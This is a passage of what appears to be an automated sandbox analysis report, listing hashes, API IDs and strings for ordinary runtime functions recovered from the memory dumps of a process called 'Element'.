                    • Instruction Fuzzy Hash: 74315A325087C1CAE760CF15A84479AB7A5F785BA5F144339EAA857AE9CF3CD841CF40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: FileHandleType
                    • String ID: @
                    • API String ID: 3000768030-2766056989
                    • Opcode ID: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                    • Instruction ID: 4cb4fc6407832dcb6dda5989d3564c3aaa0d374a4a93b692475025be2b1f1b29
                    • Opcode Fuzzy Hash: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
                    • Instruction Fuzzy Hash: 7E214122A0AAA281FB648F249C941392691EB45F75F281335D6FE877D4CF39DC82D341
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: void$void
                    • API String ID: 2943138195-3746155364
                    • Opcode ID: 6f5aee4cacbc6fe246ca5ab2d30f2c4937b5b7cecb382518a965138d612b9134
                    • Instruction ID: 08202524a9932c6aad022f9e8e3fcdbe43a70ef826e6daac4f15a9f3546736b1
                    • Opcode Fuzzy Hash: 6f5aee4cacbc6fe246ca5ab2d30f2c4937b5b7cecb382518a965138d612b9134
                    • Instruction Fuzzy Hash: 5F317E72B11B54B9FB01DFA4E8742EC37B4B758748F844526EE4953B59DB3881C6CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                    • Instruction ID: 0da8f1b8d394a5dec7f9c3b9023388de5a60ac89dc5df511761f7d215041fc94
                    • Opcode Fuzzy Hash: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
                    • Instruction Fuzzy Hash: 4C310A36A087C58BD364CF25E844B5AB7A5F788B50F144269EB9983B99CF38E851CF40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Combobox
                    • API String ID: 1025951953-2096851135
                    • Opcode ID: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                    • Instruction ID: d2313b0b0f167d5506d9aa99e9c951544b81201838fb7cecf45afa0bd7e39ec7
                    • Opcode Fuzzy Hash: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
                    • Instruction Fuzzy Hash: 35314A326097C1CAE3708F25A844B5AB7A5F7887A1F504235EAE943B99CF3CD845CF40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                    • Instruction ID: 9bf4f3512f551e9505aec7f65888f3d3189c4072c5cb712d1a1a2157da95e0bd
                    • Opcode Fuzzy Hash: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
                    • Instruction Fuzzy Hash: 3F310936A087C18AE760CF15A84475AB7A5F788BA1F144235EAAC83B99DF3CD845CF41
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _handle_error
                    • String ID: "$pow
                    • API String ID: 1757819995-713443511
                    • Opcode ID: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                    • Instruction ID: a84861939ad4f098c9fd3df2b47e419f32306baec2f6fecbc5e9af42e96573f2
                    • Opcode Fuzzy Hash: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
                    • Instruction Fuzzy Hash: 1E215E76D1CAD487E370CF10E84067AAAA0FBDA745F201325F7C946998DFBDD5419B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ExceptionFileHeaderRaise
                    • String ID: csm
                    • API String ID: 2573137834-1018135373
                    • Opcode ID: b7f0bf24e24089b3b6b2a80f99f4933534a93aae09fc32197e4a578997ebfa6a
                    • Instruction ID: edf7a48ea9c45467f121370e7894867645139fd7f193e61000eb579df35c7e60
                    • Opcode Fuzzy Hash: b7f0bf24e24089b3b6b2a80f99f4933534a93aae09fc32197e4a578997ebfa6a
                    • Instruction Fuzzy Hash: 6E112B36618B4092EB618F25F46439A77E5F798B88F584220DF8D07758EF3DC592CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3712363035-3916222277
                    • Opcode ID: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
                    • Instruction ID: 65ff2631515d61e7b349d9eb280eb897c88238155d01cda985917ddb64806ce3
                    • Opcode Fuzzy Hash: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
                    • Instruction Fuzzy Hash: 46115231A0C78186E7508F16FD4426AB7A5FB84B81F055135EACDC7A6ACF3DD858CB40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _ctrlfp_handle_error_raise_exc
                    • String ID: !$tan
                    • API String ID: 3384550415-2428968949
                    • Opcode ID: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                    • Instruction ID: 1b57da7b77b2a826f991b61673cd24e8afa13753bbe65d6f99edee02493057e3
                    • Opcode Fuzzy Hash: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
                    • Instruction Fuzzy Hash: AF01B931E19B8541DA14DF12AC0033A61A6FF9ABD4F505334E99D0BB84EF7CD5408B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Xinvalid_argument__std_exception_copystd::_
                    • String ID: map/set too long
                    • API String ID: 2536225881-558153379
                    • Opcode ID: 3071485586bbb77e1dbe4cab80e9d37afc6a8a7c0296d48938d2cf686b89d60a
                    • Instruction ID: c227003fd7d67fa3a337e359f2037bee1a5001882d4fde122d2807962f0c75b0
                    • Opcode Fuzzy Hash: 3071485586bbb77e1dbe4cab80e9d37afc6a8a7c0296d48938d2cf686b89d60a
                    • Instruction Fuzzy Hash: 35E06D71A11B04A0FB01AF21E8B42D86360D738754F98D222DD5C46361EA38D5E6C300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _ctrlfp_handle_error_raise_exc
                    • String ID: !$sin
                    • API String ID: 3384550415-1565623160
                    • Opcode ID: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                    • Instruction ID: 1778d53702e03a2dac7e0748cff55df39ed7aa1856bededf1e3811c5c88fed36
                    • Opcode Fuzzy Hash: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
                    • Instruction Fuzzy Hash: 55018872E19BC941D614DF12AC4037A6162BF9ABD4F504334E99D1ABD4EF7CD5414700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _ctrlfp_handle_error_raise_exc
                    • String ID: !$cos
                    • API String ID: 3384550415-1949035351
                    • Opcode ID: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                    • Instruction ID: 253ece822fcc6254754441b78048024f7d147b22324a8f30f7dcfd569a3566e0
                    • Opcode Fuzzy Hash: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
                    • Instruction Fuzzy Hash: CF01D472E19B8982DA14DF22AC0037A6162BF9ABD4F504334E99D1ABC9EF7CD4418B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _handle_error
                    • String ID: "$exp
                    • API String ID: 1757819995-2878093337
                    • Opcode ID: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                    • Instruction ID: cf014a627410cf2688e2fd8edd2e459e6622e9ec56f4488208709af3416202c6
                    • Opcode Fuzzy Hash: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                    • Instruction Fuzzy Hash: 5701DB3A929B9883E720CF24D8492AA7771FFEA705F201315E7841A664DB7DD4819F00
                    APIs
                    • try_get_function.LIBVCRUNTIME ref: 00007FF6C5897479
                    • TlsSetValue.KERNEL32(?,?,?,00007FF6C58970D1,?,?,?,?,00007FF6C589649C,?,?,?,?,00007FF6C5894B1B), ref: 00007FF6C5897490
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Valuetry_get_function
                    • String ID: FlsSetValue
                    • API String ID: 738293619-3750699315
                    • Opcode ID: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                    • Instruction ID: e149ee9bd74a5445f79ca7cfb20edbccc82079d284b4e06ee68cd79057decd61
                    • Opcode Fuzzy Hash: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                    • Instruction Fuzzy Hash: CAE06DA2A0968282EF185F51FC484B92261AF48F96F484072D99D862A7CF3CEC94C250
                    APIs
                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6C5895471
                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF6C5895482
                      • Part of subcall function 00007FF6C5896EA8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6C5895487), ref: 00007FF6C5896F1D
                      • Part of subcall function 00007FF6C5896EA8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6C5895487), ref: 00007FF6C5896F4F
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                    • String ID: Unknown exception
                    • API String ID: 3561508498-410509341
                    • Opcode ID: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                    • Instruction ID: 3c484dd52a77411c01a94ceb174d760e74c99821592aa9a55220a28305e0577c
                    • Opcode Fuzzy Hash: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                    • Instruction Fuzzy Hash: E7D01722A19A8691DF10EF00DC943A97334FB80B0AFE04531E18CC15B6DF2CDE4AC300